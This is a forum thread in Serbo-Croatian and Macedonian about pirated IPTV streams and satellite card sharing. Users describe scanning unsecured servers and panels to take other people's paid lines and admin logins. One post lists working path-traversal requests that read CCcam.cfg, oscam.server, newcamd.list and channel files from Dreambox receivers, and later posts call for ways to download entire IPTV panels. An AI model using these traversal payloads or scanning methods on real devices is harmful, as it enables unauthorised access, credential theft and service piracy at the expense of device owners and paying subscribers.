Интернет радио и телевизија (стримови, прашања, генерална дискусија...)

• Креатор на темата Креатор на темата alekjov
  • Време на започнување Време на започнување
hoces dijeliti na pp ili javno[DOUBLEPOST=1513627272][/DOUBLEPOST]
sve se krije u jednom portu i tacan naziv filea koji se downloaduje sa server ,koji je,reci cemo od nekog ko nije expert i nije zasticen 100%,sa tim portom i tacnim nazivom filea,downloadujes ili admin podatke za login ili usere sa servera.Sam sam sa jednog servera koji je zakljucan downloadovao file u kojem pise admin podaci za login i udjem,server nije sjajan ,ali sam siguran da tako i nasi znalci dolaze do linija.Sa stalkera nekog sam opet slucajno downloadovao file u kojem su linije koje koristi vlasnik,a i cccam cfg ,oscam.server se vadi komandom iz dreamboxa,e u tome je sva poenta ako covjek zna,ali nama koji neznamo je tesko doci do toga,e tako cim se server pojavi za nekoliko sekundi ljudi povade usere sve...tako ti je to,a neka me demantuju ako nije poenta u portu i komandi
ok... vidim da znaš nešto, ja ne znam ni toliko... a kako da downloadujem takve stvari, program postoji i za to ili... hm kako da znam šta i kako downloadujem.... to treba da se objasni malo na široko koliko vidim.... želim da dođem do svog tog znanja...

ma prijatelju neznam ni ja oko toga.Dok su dreamboxi bili u modi,dosao sam slucajno do komande kojom se vadi ccam iz zakljucanog dreamboxa,tako sam i u dreamu nasao neku listu,neki server nepoznat,u browseru pokusao otvoriti server,normalno trazi user i pass,bezveze sam skenirao otvorene portove i na 3600 sam skinuo SLUCAJNO neznanjem,neki file u kojem su bili podaci za login ,e tako i za stalker jedan isto,downloadovao file u kojem su linije ,i tako nasi znalci dolaze do linija,udju u jedan server,u serveru 20 razlicitih linija i ,i 100 usera i eto,ali.....

ma prijatelju neznam ni ja oko toga.Dok su dreamboxi bili u modi,dosao sam slucajno do komande kojom se vadi ccam iz zakljucanog dreamboxa,tako sam i u dreamu nasao neku listu,neki server nepoznat,u browseru pokusao otvoriti server,normalno trazi user i pass,bezveze sam skenirao otvorene portove i na 3600 sam skinuo SLUCAJNO neznanjem,neki file u kojem su bili podaci za login ,e tako i za stalker jedan isto,downloadovao file u kojem su linije ,i tako nasi znalci dolaze do linija,udju u jedan server,u serveru 20 razlicitih linija i ,i 100 usera i eto,ali.....
shvatam.... shavatam...

komande za dreambox su vec odavno na netu
/file?file=../../../../../../../../../../../../../bouqueteditor/tmp/bouquets_backup.tar

/file?file=../../../../../../../../../../../../../var/etc/CCcam.cfg

/file?file=../../../../../../../../../../../../../var/keys/newcamd.list
/file?file=../../../../../../../../../../../../../etc/tuxbox/config/oscam.server
/file?file=../../../../../../../../../../../../../etc/enigma2/userbouquet.favourites.tv

/file?file=../../../../../../../../../../../../../etc/enigma2/bouquets.tv
itd zavisi sta ko hoce da izvuce,ovo sam ja pravio,osim za cccam

Ok. Dobro ti streama dreambox, i sta hocete da dokazete ovde? Kome je veci ili sta?
ne to je dokaz do gde moze da se glupira covek kao ovi Sota.Prvo slika(koja je stavil) kanal koj je u stvari 4k iz Korea koj smo mu slikali 1 god nazad ovde da postoj tada on nije i znal da takav kanal postoj, i sad se javlja posle jedna godina kao da je otkril Amerika.Taj kanal moze da se nadzje u svaki Tvheadend u Korea.A i nemoze da ti go slika u VLC zasto tamo neradi proradi za sekundii slika ti zmruzne odmah zasto taj player nema kodeka za ovo ,radi u MPC i Potplayer ali ti opterecuje prozesor ponekad i do 100% treba da se radat dopunski podesavanja da bi se smalilo na 30% jedno veliko igranje.Kod njega niti racunar mu je 4k(vidis na slika da koristi jos win7) niti televizor mu 4K ,a vlc mu nije obnjavljan ot drugi svetski rat.hehe.I ti prica ovde kakav bil kvalitet :pos:- pa ako nemas 4k oprema kvalitet ti je isti kao na HD i Full HD.Kad kupi tv koje je 4k i sve ostalo tada ce vidi kakva e razlika a do tada ce si prica glupostima po forumi .

pozdrav svima,ajde da jednu stvar razlučimo,gledanje listi skeniranjem,to ti je isto kao dobiti sedmicu na lotu,jer kao manijak skeniraš,i gubiš vrijeme,ups nađeš listu,sav sretan...drugi dan,nema....lako je probijati panele,od vlasnika,koji misle na brzinu zaraditi lovicu,do prave liste moraš biti dobar s vlasnikom,možda ju i dobiješ....ali,najbolja je opcija skeniranje s mac-om,ako ubodeš,gledaš duže...s passwordima zaboravite,jer,ste naučili vlasnike,kako da se zaštite,npr,pogodiš moj pass,gledaš listu,e sada...ja sam platio tu listu,ti ju gledaš,ja se konektiram,ti plačeš,jer se gasi,netko će to shvatiti,o čemu pišem....[DOUBLEPOST=1513625927][/DOUBLEPOST]inače više ne skeniram liste...podjeliti ću vam alate za skeniranje,pred blagdane,da očistim laptop,možda komu pomogne....
Zok ako neznas kako stvari funkcioniraju a tvrdim da neznas pa bih te molio nemoj ovdje sirit neistinu.Daleko si do pravog odgovora a nikad ga neces ni saznat[DOUBLEPOST=1513630389][/DOUBLEPOST]
ne to je dokaz do gde moze da se glupira covek kao ovi Sota.Prvo slika(koja je stavil) kanal koj je u stvari 4k iz Korea koj smo mu slikali 1 god nazad ovde da postoj tada on nije i znal da takav kanal postoj, i sad se javlja posle jedna godina kao da je otkril Amerika.Taj kanal moze da se nadzje u svaki Tvheadend u Korea.A i nemoze da ti go slika u VLC zasto tamo neradi proradi za sekundii slika ti zmruzne odmah zasto taj player nema kodeka za ovo ,radi u MPC i Potplayer ali ti opterecuje prozesor ponekad i do 100% treba da se radat dopunski podesavanja da bi se smalilo na 30% jedno veliko igranje.Kod njega niti racunar mu je 4k(vidis na slika da koristi jos win7) niti televizor mu 4K ,a vlc mu nije obnjavljan ot drugi svetski rat.hehe.I ti prica ovde kakav bil kvalitet :pos:- pa ako nemas 4k oprema kvalitet ti je isti kao na HD i Full HD.Kad kupi tv koje je 4k i sve ostalo tada ce vidi kakva e razlika a do tada ce si prica glupostima po forumi .
tako je ako nemas opremu badava ti strem i da je 7K hhahah
tako ti i kod ides kod komsinice nista bez alata hahha

Последно уредено:
Pa to hocu da kazem, slikajte nekome ko ne razume. 4K za sad mozes da gledas najbolje preko satelitske. Vidite samo kolko je velik jedan film u 4K. A u iptv listama moze da pise Ultra Tv, ali nije ni blizu Hd kvalitetu.

Sta je to c linija?

to ti je evo ovi sta diskutiraju oko tome :) trebas imati dreambox sa satelitska antena u njega ubacujes cccam mgcamd i tako dalje.. s ovo bolje radi sve nego IPTV kanale sta ovi slikaju fotografiraju hahah

to ti je evo ovi sta diskutiraju oko tome :) trebas imati dreambox sa satelitska antena u njega ubacujes cccam mgcamd i tako dalje.. s ovo bolje radi sve nego IPTV kanale sta ovi slikaju fotografiraju hahah
1111111111111.png

evo dokaz tako nema sta je C linija:angel:
a ovo mutno ti famozni ART iptv pa ti vidi sta je bolje
Bez_naslova.jpg

panelrazaraču,pošalji mi listu koja će raditi bar tri dana...onda uvažavam tvoje mišljenje,i molim vas ne javljate mi se na pm,tražeći alate,jer i s tim alatima morate znati raditi,nije samo stisnuti,i evo liste....ma uostalom,gledajte slike,i sanjajte o tv kanalaima...visoke rezolucije

Jel zna neko kao da otvorim rtmp listu umesto ts liste?
U panel_api piše da je podržan rtmp

Код:
http://server:port/get.php?type=m3u&username=xxxxxxxx&password=xxxxx&output=rtmp

Код:
"allowed_output_formats": [
      "m3u8",
      "ts",
      "rtmp"
    ]

ne trazite alate dzaba ni od koga,ovo alata sto ima objavljenih je dovoljno.Skener bez comba je kao kad podjes u svatove bez k....A combo dobar nemoze postojati,tako da manite se alata i moljakanja za alate ,nego se useri vade

server:port/i par slova i zato svi koji cekamo ko ce nam dati listu potrudimo se da umjesto skeniranja i izmisljanja nekog "svog" comba ,kako nas upucuju,bolje da izmisljamo kako se downloaduje cijeli "laksi panel"
I kad sam ja prije x godina kad je vladao card sharing slucajno izvukao komandu kako se vadi c linija ,pa nekim kolegama sa foruma kad mi poslaju domaci dream da im izvucem c linije ,ja sam za njih bio HAKER,i bio "znalac"za njih,a ustvari ja zalijepim /file?file=../../../../../../../../../../../../../var/etc/CCcam.cfg i uzmem linije za sekundu,i ko fol pravim se da nesto znam...i daj nadjimo sta se to zalijepi i na iptv panel svi koji neznamo nista udruzimo se

Последно уредено:

Kajgana Shop

Back
На врв Bottom